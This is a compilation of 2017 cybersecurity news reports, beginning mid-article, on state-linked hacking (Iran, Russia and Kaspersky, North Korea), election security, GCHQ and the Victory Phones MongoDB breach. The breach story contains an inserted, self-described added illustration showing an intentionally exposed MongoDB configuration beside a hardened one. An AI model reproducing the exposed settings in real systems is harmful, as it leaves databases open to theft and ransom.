“According to intelligence officials, the cyberattack “bombarded parliamentary email accounts” but only compromised about 1 percent of the accounts it affected. The attack was initially thought to be the result of amateur hackers and not a nation-state.” reported the Hill.

According to The Times, the attack was initially attributed to Russia, but further investigation linked the offensive to Iranian hackers.

“Iran carried out a “brute force” cyberattack on parliament that hit dozens of MPs this summer, according to a secret intelligence assessment.” reported The Times.

“Some 9,000 email accounts, including those belonging to Theresa May and other cabinet ministers, were subjected to a sustained attack on June 23. Ninety accounts were compromised.”

“Whitehall officials admitted it was inevitable that the hackers had obtained sensitive material,” the Times reported.

The investigation is still ongoing; for this reason, neither the House of Commons nor the National Cyber Security Centre commented on the attack.


The attack was discovered during a secret intelligence assessment; sources described the Iranian threat actors as “highly capable actors in the cyber world”.
“It was not the most sophisticated attack, but nor did it need to be.” a second source added. “It is possible they were simply testing their capability.”
The revelations come as Donald Trump has threatened to terminate the 2015 Iran nuclear deal if Congress and US allies fail to amend the agreement in significant ways.

The UK Prime Minister, along with Angela Merkel and Emmanuel Macron, insists on preserving the pact because of its implications for a “shared national security interest.”

A statement from the UK, France, and Germany said the International Atomic Energy Agency has “repeatedly confirmed” Iran’s compliance with the terms it signed up to.

Back to the cyber attack that hit 9,000 email accounts, there are various hypotheses about the attackers’ motivation.

The attack could be part of a wider cyber espionage campaign, but another concerning option is that Iran was trying to find embarrassing material to blackmail MPs.

Iranian hackers are becoming increasingly aggressive, even though experts believe they are not particularly sophisticated.

Recently we discussed that the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.

OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


Kaspersky in Focus as US-Russia Cyber-Tensions Rise
15.10.2017 securityweek BigBrothers
The security software firm Kaspersky has become the focal point in an escalating conflict in cyberspace between the United States and Russia.

The Russian-based company has been accused of being a vehicle for hackers to steal security secrets from the US National Security Agency, and was banned by all American government agencies last month.

But it remains unclear if Kaspersky was part of a scheme or an unwilling accomplice in an espionage effort.

The software firm has argued it has no ties to any government and said in a recent statement it is simply "caught in the middle of a geopolitical fight."

But the latest accusations highlight what some see as a simmering cyberwar between the two powers.

Related: The Increasing Effect of Geopolitics on Cybersecurity

"Currently, we're losing," said James Lewis, a fellow with the Washington-based Center for Strategic and International Studies.

"It's not the kind of conflict we're used to."

The Kaspersky allegations come in the wake of an apparent Russian-led effort to manipulate social media and influence the 2016 US presidential election.

Russia has an advantage because "they have figured out how to use our civil liberties against us and there's not much we can do about it," Lewis said.

"We don't have a group that does this kind of psychological warfare and we don't have the legal authority to defend against it."

Peter Singer, a New America Foundation strategist and author who has written on 21st century warfare, agreed that Russia is gaining ground in this cyber conflict.

"If it's a 'cyberwar,' it is akin to a Cold War-style back-and-forth of everything from stealing secrets to political influence operations," Singer said.

"Given that the Russians have so far got away with no real consequences for the biggest, most impactful operation, the hacks and influence campaign targeting the 2016 US election, I'd say they are doing pretty well."

- Cat-and-mouse game -

But Gabriel Weimann, a professor at Israel's University of Haifa and author who has written on cybersecurity, said it may be premature to declare Russia the winner.

"We don't really know the achievements of NSA in monitoring the web, this kind of information is secret," Weimann said.

"This is a cat-and-mouse game. You respond to breaking in and the other side responds and it becomes more dangerous and more sophisticated."

On Tuesday, the New York Times reported that Israeli intelligence had hacked into the Kaspersky network and upon detecting the Russian intrusion, alerted the United States, which led to a decision last month for Kaspersky software to be removed from US government computers.

The online news site CyberScoop, citing anonymous sources, reported separately this week that Kaspersky as early as 2015 sought to promote its anti-virus software as a tool to track extremists in the Middle East.

The report said that some US officials were intrigued by the offer, but that technical members of the intelligence community interpreted this as meaning that Kaspersky's anti-virus software could be used as a spying tool.

CyberScoop said that Russian officials from the FSB, the successor to the KGB, told US officials in 2015 not to interfere with Kaspersky software, a message that set off alarm bells.

The Wall Street Journal meanwhile reported that the Russian government was able to modify Kaspersky software to turn it into an espionage tool.

Anti-virus software such as those created by Kaspersky can become a tool for espionage because it scans and can access all files in a computer or network.

Eugene Kaspersky, founder of the company which bears his name, has long denied any connection to the Russian government but said on Twitter Monday he was launching an internal investigation into the latest allegations.

A company statement this week said, "Kaspersky Lab has never helped, nor will help, for any government in the world with its cyberespionage efforts, and contrary to erroneous reports, Kaspersky Lab software does not contain any undeclared capabilities such as backdoors as that would be illegal and unethical."

Weimann said he believes Kaspersky was likely "piggybacked" by the Russian government for espionage rather than a willing participant.

Lewis agreed, saying Kaspersky is probably "an unwilling tool" in the Russian espionage effort.

Lewis said that Eugene Kaspersky "would love to be (part of) a private company headquartered in London but the Russian government won't let him."


Spy vs Spy vs Spy as Israel Watches Russian Hackers: NYT
15.10.2017 securityweek BigBrothers
Israeli spies observed Russian government hackers in real time as they scoured computers around the world for the codenames of US intelligence programs, The New York Times reported Tuesday night.

The Russian intrusion detected more than two years ago used anti-virus software manufactured by the Russian firm Kaspersky Lab as an ad hoc global search tool, the Times said, quoting current and former government officials.

The software is used by 400 million people around the world, including by officials at some two dozen American government agencies, the Times reported.

Israeli intelligence had hacked into the Kaspersky network and upon detecting the Russian intrusion, alerted the United States. This led to a decision last month for Kaspersky software to be removed from US government computers, the Times said.

It is known that Russian hackers stole classified documents from a National Security Agency employee who had stored them on his home computer which featured Kaspersky antivirus software, the paper said.

It said that it is not yet publicly known what other secrets the Russians may have obtained from US government agencies by using Kaspersky software as "a sort of Google search for sensitive information."

The Times said Kaspersky Lab denied any knowledge of or involvement in the Russian hacking.


North Korean Hackers Targeted U.S. Electric Firms: Report
15.10.2017 securityweek BigBrothers
Hackers likely affiliated with the North Korean government seem to lack the ability to disrupt the U.S. power supply, according to a new report from FireEye.

The state-sponsored actors conducted a reconnaissance attack against electric companies in the United States on Sept. 22, 2017, via spear-phishing emails, but the incident did not lead to a disruption, the security company reports.

In fact, no evidence was found that North Korea-linked actors would even have the capability to compromise or manipulate the industrial control systems (ICS) networks that regulate the supply of power.

Attacks targeting the energy sector aren’t new, and FireEye says it has detected “more than 20 cyber threat groups suspected to be sponsored by at least four other nation-states attempting to gain access to targets in the energy sector that could have been used to cause disruptions.”

Given the current tensions with North Korea, the attacks should come as no surprise.

Utility executives worldwide fear that cyber-attacks could cause disruptions to electric distribution grids. To improve the resilience and security of critical energy infrastructure, the United States Department of Energy announced last month plans to invest over $20 million in cyber security.

Last month, Symantec warned of Russian hackers hitting the energy sector in the United States and other countries with a focus on gaining access to control systems. Iranian-backed cyber espionage actors were observed targeting energy organizations too, and so were Chinese hackers last year.

While North Korea-linked hackers were accused of targeting the South’s nuclear power plants operated by Korea Hydro and Nuclear Power (KHNP), the attack apparently focused on stealing sensitive KHNP documents, “as part of an effort to exaggerate the access they had and embarrass the South Korean Government,” FireEye says.

The technique is apparently used by the North Korean government either to instill fear or to serve domestic propaganda purposes. Cyber actors linked to the country, however, don’t appear to possess the ability to take the technical and operational steps required in attacks aimed at disrupting energy sector operations.

The spear-phishing activity observed last month “was early-stage reconnaissance, and not necessarily indicative of an imminent, disruptive cyber-attack that might take months to prepare if it went undetected (judging from past experiences with other cyber threat groups),” the security researchers point out.

The suspected North Korean actions are supposedly part of an attempt to demonstrate a deterrent capability rather than the first stages of a larger attack. “For North Korea, even limited compromise of power companies would probably be exaggerated and hailed as a victory by Pyongyang,” FireEye says.

On the other hand, an increasing number of nation-states are developing the capability to disable the operations of power utilities. Moreover, because North Korea-linked actors are bold, they likely remain committed to targeting the energy sector, especially in South Korea and among the U.S. and its allies, the researchers believe.

These actors have already been associated with various cyber-attacks this year, including one targeting the South’s wartime operational plans, and several hitting crypto-currency exchanges, possibly in an attempt to bolster finances. Hackers with ties to North Korea were also deemed a serious threat to banks earlier this year.

“North Korea linked hackers are among the most prolific nation-state threats, targeting not only the U.S. and South Korea but the global financial system and nations worldwide. Their motivations vary from economic enrichment to traditional espionage to sabotage, but all share the hallmark of an ascendant cyber power willing to violate international norms with little regard for potential blowback,” FireEye concludes.

"It doesn't seem like a phishing attack deserves too much attention these days - especially one that was unsuccessful in penetrating target networks,” Eddie Habibi, CEO of PAS Global, told SecurityWeek. “The fact that it was North Korea isn't a big surprise nor that power was in the crosshairs. What is worth noting is that as tensions continue to rise with North Korea, we should expect the intensity of cyber attacks aimed at U.S. critical infrastructure to rise as well.”


Trump Issues Threat Sharing Directive to Intelligence Community
15.10.2017 securityweek BigBrothers
President Trump issued a memorandum on Oct. 5 requiring the intelligence community to establish an inter-agency information sharing network. Agency heads are required to submit a plan within 270 days. Missing from the memorandum is any mention of existing projects such as the Cyber Threat Intelligence Center (CTIC) or the Intelligence Community IT Enterprise (IC ITE, pronounced 'eyesight').

Inter-agency information sharing has been a pressing issue and problem since 9/11 when it was suggested that different agencies had partial information about the terrorist plot, but there was no way to 'connect the dots' and see the overall picture. Since then there have been numerous initiatives to improve information sharing -- such as the Cybersecurity Information Sharing Act (CISA) and the CTIC and IC ITE projects.

IC ITE is a long-term intelligence community initiative to provide what this new memorandum seems to require. The current strategy document, produced by the Office of the Director of National Intelligence (at that time, James Clapper) states (PDF): "The IC ITE represents a strategic shift from agency-centric information technology (IT) to a common enterprise platform where the Intelligence Community (IC) can easily and securely share technology, information, and capabilities across the Community." However, the timeframe covered by this document is 2016 to 2020 -- and it may be that the new Trump memorandum is seeking to speed the process.

Trump has been a critic of the intelligence community since before his election. It is not clear whether this memorandum is designed to replace the existing projects or merely to hasten their completion. Memoranda are used by presidents in a manner similar to executive orders, and place a similar legal requirement on government agencies. They have been described as 'an executive order by another name'.

The gist of the memorandum is that the intelligence community must establish a 'threat actor' information sharing architecture under guidance from NIST, and present their plan to the president within 270 days. "The Secretary of Defense, the Attorney General, the Secretary of Homeland Security, and the Director of National Intelligence, in coordination with the Secretary of State, the Secretary of the Treasury, and the Secretary of Energy, shall, through the Assistant to the President for Homeland Security and Counterterrorism, submit to the President a plan to implement this memorandum."

There is no indication on how the threat sharing is to be implemented; and of course no guarantee that the president will accept the plans. There is, however, a strong concentration on the need to share personal information of potential threat actors. "National security threat actor information," states the memorandum, "comprises identity attributes and associated information about individuals, organizations, groups, or networks assessed to be a threat to the safety, security, or national interests of the United States that fall into one or more of the categories listed in the annex to this memorandum."

'Identity attributes' are then defined as "Information (including biometric and biographic data) that can be used independently or in combination with other data to identify a specific individual."

It is the lack of detail that is most worrying. The devil is always in the detail, comments Christopher Bray, SVP at Cylance Inc. The big question, he suggests, is how this can be translated into policy while respecting applicable laws, civil liberties and individual privacy. "These are extremely important questions that need to be crisply defined and addressed within established legal and constitutional frameworks," he told SecurityWeek. "You only need to think about the clumsy implementation of the 'no fly list' and the examples of completely innocent people arbitrarily getting placed on it in error -- with lack of a clear process for recourse or getting removed, to see what a minefield this could become if not thought through well." Will this be implemented into anything meaningful at all, he wonders, or just become 'policy shelf-ware' that someone can point to later as having 'done something'.

Nathan Wenzler, chief security strategist at AsTech, sees nothing that addresses the long-standing problems for information sharing. "The challenge previously is that each of the agencies involved tends to collect information that is very specific to their purposes and it is in that specificity that there is fear that others who possess the data will be able to discern how that data was obtained and collected. This has caused many in the intelligence community to fear the compromise of those data gathering sources, whether human or technological, and has made previous efforts to integrate and share such data nearly impossible."

Like Bray, he is also concerned about the privacy impact of the memorandum. "The potential for compromise to intelligence sources, the vast privacy concerns that will exist should any U.S. citizen wrongly be targeted in these profiling efforts, and the fact that effectively locating multiple copies of the same data sets in different places means that cyber attackers have more potential targets in which to steal this information means this memorandum creates far more questions than it begins to answer."

Ross Rustici, senior director, intelligence services at Cybereason, wonders if the memorandum is designed to increase the capability of the CTIC, "which was stood up in the twilight of Obama's administration. The idea behind the CTIC," he told SecurityWeek, "was to create a new cyber threat center for cyber. However, because the initial operating capacity was being built as the administration was packing up it never got the full capability or support necessary to be effective."

However, he also suggests that the memorandum is indicative of the slow progress made to date. It "shows how little the creation of the Director of National Intelligence and the 9/11 Commission has impacted business as usual in the intelligence community. In addition, the focus on 'threat actors and their networks' speaks to something beyond sharing data for defending networks. This directive is about increasing the intelligence community's ability to share all the dots they already have to connect them better."


Hacking the Election: Security Flaws Need Fixing, Researchers Say
15.10.2017 securityweek BigBrothers
Hackers could have easily infiltrated US voting machines in 2016 and are likely to try again in light of vulnerabilities in electronic polling systems, a group of researchers said Tuesday.

A report with detailed findings from a July hacker conference which demonstrated how voting machines could be manipulated concluded that numerous vulnerabilities exist, posing a national security threat.

The researchers analyzed the results of the "voting village" hacking contest at the DefCon gathering of hackers in Las Vegas this year, which showed how ballot machines could be compromised within minutes.

"These machines were pretty easy to hack," said Jeff Moss, the DefCon founder who presented the report at the Atlantic Council in Washington. "The problem is not going away. It's only going to accelerate."

The report said the DefCon hack was just the tip of the iceberg -- with potential weaknesses in voter databases, tabulating software and other parts of the system.

The researchers said most voting machines examined included at least some foreign-manufactured parts, raising the possibility that malware could be introduced even before the devices are delivered.

"This discovery means that a hacker's point-of-entry into an entire make or model of voting machine could happen well before that voting machine rolls off the production line," the report said.

"With an ability to infiltrate voting infrastructure at any point in the supply chain process, then the ability to synchronize and inflict large-scale damage becomes a real possibility."

- No certainty on 2016 -

Harri Hursti, a researcher with Nordic Innovation Labs and a co-author of the report, said it's impossible to say with certainty if votes were tampered with in 2016 because many systems "don't have the capacity" to be audited.

The report said five US states operate entirely on paperless systems which have no paper trail to be reviewed and another nine states are partially paperless.

"The only way to know is if the hacker tells you," he said, adding that "it can be done without leaving tracks."

Douglas Lute, former US ambassador to NATO who presented the report, said in a foreword to the report that the findings highlight "a serious national security issue that strikes at the core of our democracy."

Although some researchers in the past have shown individual machines could be breached, this report suggests a range of vulnerabilities across a range of hardware, software and databases.

"What the report shows is that if relative rookies can hack a voting system so quickly, it is difficult to deny that a nefarious actor -- like Russia -- with unlimited time and resources, could not do much greater damage," said University of Chicago cybersecurity instructor Jake Braun, another co-author.

The threat becomes all the more grave "when you consider they could hack an entire line of voting machines, remotely and all at once via the supply chain," he added.

In presenting the findings, the researchers said members of the DefCon hacker community would work with academics and security researchers in a new coalition aimed at improving election security.


UK's Top Spy Agency Coming Out of the Shadows: GCHQ Director
15.10.2017 securityweek BigBrothers

The UK's Government Communications Headquarters (GCHQ) is one of the UK's more secretive intelligence agencies. Its existence was not acknowledged until 1976, when investigative journalists Duncan Campbell and Mark Hosenball (an American journalist working in the UK) 'outed' the organization in an article in Time Out. Hosenball was rapidly deported because he was deemed to be a threat to UK national security.

GCHQ started life at the end of the First World War as the Government Code and Cypher School (GC&CS). It operated from Bletchley Park during the Second World War where it, and particularly Alan Turing, were instrumental in breaking the German Enigma encryption system. Even that was not acknowledged for thirty years. The organization moved to Cheltenham, now occupying the 'doughnut', after the war -- and changed its name to GCHQ.

In the early 1970s, a GCHQ staff member named James Ellis developed the concept of public key encryption -- but not being a mathematician, could not make a working implementation. It was not until the 1980s that the Americans Whitfield Diffie and Martin Hellman independently discovered public key encryption. GCHQ's efforts were not publicly disclosed until 1997.

This predilection for secrecy is, overtly at least, slowly breaking down. It probably started and is an inevitable consequence of the evolution of the new National Cyber Security Centre (NCSC), which is part of GCHQ. Communications has always been the domain of GCHQ; but the rise of the internet means that crime and communications intelligence cannot realistically be separated.

Locating NCSC within GCHQ is logical, where it is able to draw upon the enormous GCHQ cyber expertise to combat crime -- whether that is terrorist related or organized crime related. However, fighting crime cannot be done in the publicity vacuum that has been the traditional domain of GCHQ. NCSC, currently celebrating its first anniversary, talks to and works with business, and advises the public on cyber security awareness. GCHQ is very slowly emerging from the shadows.

The process of emergence was highlighted on Saturday when the director of GCHQ, Jeremy Fleming, made his most extensive public comment so far in an article published in the Telegraph. He moved from MI5 to GCHQ in March 2017. Without going into details on the amount, he writes, "The Government's investment in a bigger GCHQ gives us a chance to recruit the brightest and best from across our society -- as the threat becomes more diverse, so must the workforce that tackles it."

Inside GCHQ 3 (Image Copyright GCHQ)
Much of that funding, he says, will go into making GCHQ a cyber organization as much as an intelligence organization. The difference is moot, since GCHQ has been using its cyber expertise for many years. Part of the Edward Snowden revelations disclosed a GCHQ project known as Tempora, which allegedly covertly gathered vast troves of personal internet communications which were then shared with the U.S. National Security Agency (NSA). GCHQ was also accused of targeting a Belgian telecommunications company, Belgacom, where staff computers were infected with malware in a 'quantum insert' attack to secure access to customers.

"By its nature," wrote Fleming, NCSC "has to work closely with the private sector; it works at lower (or without) security classifications, proactively engages with the media, and has a high profile in schools and universities. All of this can feel deeply challenging for a GCHQ that by necessity has worked in the shadows."

Fleming describes GCHQ as being 'at the heart of the nation's security.' "Over the past year," he writes, GCHQ/NCSC "has responded to nearly 600 significant incidents requiring a national, coordinated response. In dealing with these cases, from the WannaCry ransomware affecting the NHS through the attack on Parliament to lesser-known but important compromises and criminal attacks, the NCSC drew on GCHQ's data, analytical capabilities, skills and partnerships, which help us to prevent attacks as well as respond to them."

The WannaCry attack typifies the need to combine cyber intelligence and cybercrime activities. Ransomware is mainstream criminal activity; but the WannaCry outbreak is thought to have been delivered by nation-state actors working for North Korea. Geopolitics and cybersecurity are becoming increasingly entwined. "Keeping our citizens safe and free online must become and remain as much part of our mission as our global intelligence reach and our round-the-clock efforts against terrorism," he concludes.

It remains to be seen whether almost a century of secrecy can be altered in the new GCHQ. Whether it can or not, however, the combination of GCHQ and NCSC expertise is broadly welcomed. "The efforts of the British government to assure cybersecurity and online safety for its citizens are laudable, and should serve as an example to other countries," commented Ilia Kolochenko, CEO of High-Tech Bridge.

He warns, however, that it is an impossible task for a single nation. "However, the Internet is an open world without borders, and thus it's not an easy task to keep digital peace in a particular country or geographical area. It is virtually impossible to keep citizens of a particular country safe."

Since the problem is international and not purely cyber-related, the solution must be too. Cybersecurity cannot be achieved, "without first resolving the intertwined problems of cybercrime, poverty, political crises and nation-state attacks. International cooperation, global economic and political stability -- are vitally important to fight skyrocketing cybercrime."

Peter Yapp, Deputy Director at NCSC, will be speaking on a panel at SecurityWeek's 2017 ICS Cyber Security Conference on Oct. 25 in Atlanta to discuss the growing global threat of international intrusions and cyberattacks on critical national infrastructure. Yapp will be joined by Simon Hodgkinson, CISO at BP; Dr. Kevin Jones, Head of Cyber Security Architecture, Innovation and Scouting at Airbus; and Dr. Chris Hankin, Director at the UK ICS cyber security Research Institute (RITICS).


North Korea Hacked Seoul's War Plans: Report
15.10.2017 securityweek BigBrothers

North Korean computer hackers have stolen hundreds of classified military documents from South Korea including detailed wartime operational plans involving its US ally, a report said Tuesday.

Rhee Cheol-Hee, a lawmaker for the ruling Democratic party, said the hackers broke into the South's military network in September last year and gained access to 235 gigabytes of sensitive data, the Chosun Ilbo daily reported.

Among the leaked documents was Operational Plans 5015 for use in case of war with the North and including procedures for "decapitation" attacks on leader Kim Jong-Un, the paper quoted Rhee as saying. Rhee, a member of parliament's defence committee, could not be reached for comment, but his office said he had been quoted correctly.

The report comes amid heightened fears of conflict on the Korean peninsula, fuelled by US President Donald Trump's continued threats of military action against Pyongyang to tame its weapons ambitions.

In his latest tweet over the weekend, Trump reiterated that diplomatic efforts with North Korea have consistently failed, adding that "only one thing will work."

Pentagon spokesman Colonel Rob Manning said he was aware of the report, but declined to confirm or deny any aspect of it.

"I can assure you that we are confident in the security of our operations plans and our ability to deal with any threat from North Korea," Manning told Pentagon reporters.

"I am not going to address whether or not that (hack) has occurred. What I am going to tell you is that the (South Korea)-US alliance, that bilateral entity, is there to deal with those types of situation and safeguard against them."

- 80 percent unidentified -

Citing Seoul's defence ministry, Rhee said that 80 percent of the leaked documents had yet to be identified.

But the contingency plan for the South's special forces was stolen, he said, as well as details about annual joint military drills with the US and information on key military facilities and power plants.

A ministry spokesman declined to confirm the report, citing intelligence matters.

In May, the ministry said North Korea had hacked into Seoul's military intranet but did not say what had been leaked.

Pyongyang has a 6,800-strong unit of trained cyberwarfare specialists, according to the South Korean government. It has been accused of launching high-profile cyberattacks, including the 2014 hacking of Sony Pictures.

The Chosun Ilbo story was the second report Tuesday of military-related cyber-attacks in the Asia-Pacific.

Australia's government said separately an unidentified defence contractor had been hacked and a "significant amount of data" stolen.

There were 47,000 cyber-incidents in the last 12 months, a 15 percent increase from the previous year, Minister for Cyber Security Dan Tehan said in Canberra as he unveiled a report by the Cyber Security Centre.

The defence contractor was exploited via an internet-facing server, with the cyber-criminals using remote administrative access to remain in its network, the report said.

The hacker was reportedly based in China, but Tehan told the Australian Broadcasting Corporation that "we don't know and we cannot confirm exactly who the actor was."


Iranian Cyberspies Use New Trojan in Middle East Attacks
15.10.2017 securityweek BigBrothers
A cyberespionage group previously linked to Iran has been using a new Trojan in attacks aimed at entities in the Middle East, Palo Alto Networks reported on Monday.

The threat actor, known as OilRig, was recently spotted launching attacks against an organization within the government of the United Arab Emirates (UAE).

When it first discovered the group’s activities back in May 2016, Palo Alto Networks believed the attacks had been carried out by a known group, but researchers later determined that the campaign was actually the work of a new actor, which is now tracked as OilRig.

OilRig has been known to use a remote access trojan (RAT) named ISMDoor, which researchers also identified in attacks launched by another Iran-linked cyberspy group known as Greenbug.

In attacks seen by Palo Alto Networks in July 2017, OilRig had started using a new piece of malware dubbed “ISMAgent,” which appeared to be a variant of the ISMDoor RAT. In even more recent attacks, observed by experts in August 2017, a new injector Trojan was used by the attackers.

The new malware, tracked as “ISMInjector,” has a sophisticated architecture and includes anti-analysis techniques that were not previously leveraged by this group.

“The complex structure and inclusion of new anti-analysis techniques may suggest that this group is increasing their development efforts in order to evade detection and gain higher efficacy in their attacks,” Palo Alto Networks researchers said in a blog post.

In the attack aimed at the UAE government, hackers delivered their malware using malicious documents attached to emails with the subject line “Important Issue.” What made the emails interesting was the fact that they came from the targeted organization’s own domain. While experts initially believed that the attackers had spoofed the sender, they later determined that they actually used a compromised Outlook Web Access (OWA) account whose credentials they obtained in a previous phishing attack.

The malicious documents sent to the UAE government, tracked by Palo Alto as “ThreeDollars,” delivered the new ISMInjector Trojan, which in turn dropped a variant of the ISMAgent backdoor by injecting it into a remote process it created.

In order to make analysis of ISMInjector more difficult, the malware’s developers have relied on what researchers call “state machines” to create a new process and inject the payload into that process. Each state is responsible for conducting a particular action and it specifies the next state that should be executed.

Since the states are not executed in sequential order, researchers analyzing the malware have to jump around in the code to determine how it works, which makes it more challenging to investigate the threat. Analysis of the malware is further complicated by the use of a crypter.

Iran appears to have several cyber espionage groups, including APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


Israel Hacked Kaspersky, Caught Russian Spies Hacking American Spies, But...
14.10.2017 thehackernews BigBrothers
The cold cyber war has just turned hot.
According to a story published today by the New York Times, Israeli government hackers hacked into Kaspersky’s network in 2015 and caught Russian government hackers red-handed hacking US government hackers with the help of Kaspersky.
In other words — Russia spying on America, Israel spying on Russia and America spying on everyone.
What the F^#% is going around?
It is like one is blaming another for doing exactly the same thing it is doing against someone else. Wow!
Well, the fact that everyone is spying on everyone is neither new nor any secret. However, somehow Kaspersky Lab is now at the centre of this international espionage tale for its alleged role.
Just last week, the Wall Street Journal, an American media agency, published a story against Kaspersky, a Russian antivirus provider, claiming that Russian government hackers stole highly classified NSA documents and hacking tools in 2015 from a staffer's home PC with the help of Kaspersky Antivirus.
Even if the incident is real, the Wall Street Journal article, quoting multiple anonymous sources from the US intelligence community, failed to provide any substantial evidence of whether Kaspersky was intentionally involved with the Russian spies or whether some hackers simply exploited a zero-day vulnerability in the antivirus product.
Now the latest NYT story, again quoting an anonymous source from the Israeli intelligence agency, seems to be another attempt to justify the claims made in the WSJ article about Russians hacking NSA secrets.
"The role of Israeli intelligence in uncovering [the Kaspersky Labs] breach and the Russian hackers’ use of Kaspersky software in the broader search for American secrets have not previously been disclosed," the NYT reported.
According to the report, United States officials began an immediate investigation in 2015 after Israel officials notified the U.S. National Security Agency (NSA) about the possible breach.
Indeed, in mid-2015, Moscow-based Kaspersky Lab detected sophisticated cyber-espionage backdoor within its corporate network and released a detailed report about the intrusion, although the company did not blame Israel for the attack.
At the time, Kaspersky said that some of the attack code the company detected shared digital fingerprints first found in the infamous Stuxnet worm, same malware which was developed by America and Israel to sabotage Iran's nuclear program in 2010.
This suspicion of malicious behaviour by Kaspersky eventually led the U.S. Department of Homeland Security (DHS) to ban and remove Kaspersky antivirus software from all of its government computers.
Moreover, just last month, the U.S. National Intelligence Council shared a classified report with NATO allies concluding that the Russian FSB intelligence agency had access to Kaspersky's databases as well as the source code.
However, Kaspersky Lab has always denied any knowledge of, or involvement in, any cyber espionage operations.
"Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage efforts," Kaspersky's founder Eugene Kaspersky said in a statement.
Eugene today also announced that he has just launched an internal investigation to cross-check whether United States law enforcement agencies (LEA) have relevant facts.
Eugene previously admitted there's a possibility that NSA hacking tools could have been picked up as malware by its anti-malware scanner, because antivirus products are designed to work that way.
"We absolutely and aggressively detect and clean malware infections no matter the source," the antivirus company said.
Until now it is quite tough to judge if Kaspersky was involved in any wrongdoing, but the ball is in America's court, which has to provide the actual evidence to the world about the highly classified Israeli counter-intelligence operation.


Republican polling firm Victory Phones database was hacked
14.10.2017 securityaffairs BigBrothers

The databases of the Republican polling firm Victory Phones were hacked just after the 2016 election, exposing donor records.
Victory Phones, an automated phone research and data compilation firm, was hacked in January, exposing data on hundreds of thousands of Americans who submitted donations to Republican political campaigns.

Victory Phones carries out phone polling on behalf of Republican candidates and also runs fundraising systems for political campaigns.

According to ZDNet, which first reported the incident, the hack exposed several database files, one of them a 223 gigabyte archive containing about two billion records.

The stolen records include 166,046 unique email addresses and contain names, postal and email addresses, phone numbers, genders, and donation amounts.

Have I been pwned? (@haveibeenpwned)
New breach: Victory Phones exposed 166k addresses via unsecured Mongo DB. 75% were already in @haveibeenpwned. More: http://www.zdnet.com/article/republican-polling-firm-hacked-exposing-donor-records/
11:05 PM - Oct 11, 2017

Experts believe the hackers targeted the company because they were primarily interested in individual donations made to political campaigns.

“According to public records, the company gave $207,602 to a campaign by Rand Paul (R-KY) and $79,646 to Martha Roby (R-AL). The company also gave $103,977 to the Republican Party of Michigan, where the company is located, and $64,229 to the Republican National Committee, among others.” reported ZDNet.

The data contains names, postal and email addresses, phone numbers, genders, and donation amounts.

The popular cyber security expert Troy Hunt, who runs the data breach notification service Have I Been Pwned, reached out to several individuals whose data was included in the stolen databases, and all of them confirmed the authenticity of the information leaked online.

Victory Phones was running an unsecured MongoDB installation, as confirmed by chief executive David Dishaw, who added that the company never received a ransom note.

“We can confirm that in early January 2017, we were one of tens of thousands of users whose MongoDB instance was hacked. We received no ransom note or communication regarding this intrusion, in the immediate aftermath, or up until even now. We took steps to enhance the security of our data, and notified our users at that time of the breach. We will continue to keep them up to date as we come into any information that is relevant.”

MongoDB ransom attacks soared early this year; according to the Australian Communications and Media Authority, the number of hacked systems more than doubled to 27,000 in just one day. According to experts, the attackers run an extortion scheme: they copy and then delete the data from vulnerable databases.

Crooks request the payment of a ransom to return the data and to help the company fix the flaw they exploited. In late 2016, I reported the story of a mysterious attacker who went online with the harak1r1 moniker; he was breaking into unprotected MongoDB databases, stealing their content, and requesting a 0.2 bitcoin (US$184) ransom to return the data.

The attacks were discovered by the co-founder of the GDI Foundation, Victor Gevers, who warned of the poor security of MongoDB installations in the wild.

ZDNet confirmed that, at the time of writing, a Victory Phones server with an open database port was still indexed on Shodan.
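As an added illustration that is not part of the original report or of any Victory Phones configuration, the first mongod.conf document below shows the exposed shape the article describes (an internet-reachable port with no authentication, the upstream default before MongoDB 3.6), and the second shows the corrected settings; the private address and certificate path are assumptions.

```yaml
# Added example (not from the article): the weak setting beside the corrected one.
# --- Exposed: listens on every interface and accepts unauthenticated clients ---
net:
  port: 27017
  bindIp: 0.0.0.0          # reachable from the internet, hence indexed by Shodan
security:
  authorization: disabled  # anyone who can connect can dump and drop every database
---
# --- Hardened: reachable only from the application host and requires credentials ---
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.0.5   # assumed private address of the application server
  tls:
    mode: requireTLS           # MongoDB 4.2+ (older releases use net.ssl)
    certificateKeyFile: /etc/ssl/mongodb.pem   # assumed path
security:
  authorization: enabled       # create an admin user first, then every client must authenticate
```

After restarting mongod with the hardened document, a connection attempt from any address not listed in bindIp is refused, and an unauthenticated local session is denied listDatabases, which is the check worth repeating whenever the host is rebuilt.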

“The breach may not be significant in terms of numbers of individuals affected compared to other breaches of voter information — much of the data is already public on the Federal Election Commission’s website. But the hack represents yet another data exposure at a time of heightened concern about election interference.” continues ZDNet.

Hunt confirmed that 75 percent of email addresses were already in Have I Been Pwned’s database.


Israeli hackers caught Russian cyber spies abusing Kaspersky AV to steal NSA secrets
14.10.2017 securityaffairs BigBrothers

Israeli hackers compromised Kaspersky's infrastructure and caught Russian spies using the AV tool to harvest NSA exploits. Kaspersky was not aware of the hack.
There is still a heated discussion about the alleged hack of Kaspersky’s antivirus and its use to steal an NSA exploit from a US subcontractor.

Explosive new revelations put US-Israeli cooperation at risk.

Israeli cyber spies looked on as Russian state-sponsored hackers breached Kaspersky software two years ago to gather data on US intelligence programs.

The Israeli agents discovered the Russian operation after they themselves had hacked into Kaspersky's systems. This revelation clarifies the position of the security firm, which was aware that its software had been hacked by intelligence agencies.

Last month, the US government decided to stop using the Russian firm’s software on its computers.

The Israelis reported the discovery to US intelligence; in response, the US Government banned the Russian firm's solutions from federal agencies.

“It was a case of spies watching spies watching spies: Israeli intelligence officers looked on in real time as Russian government hackers searched computers around the world for the code names of American intelligence programs.” reported The New York Times.

“The Israeli officials who had hacked into Kaspersky’s own network alerted the United States to the broad Russian intrusion, which has not been previously reported, leading to a decision just last month to order Kaspersky software removed from government computers.”

The Russian operation, which allowed the theft of classified documents from an NSA employee who had stored them on his PC running Kaspersky’s antivirus software, was described by “multiple people who have been briefed on the matter”.

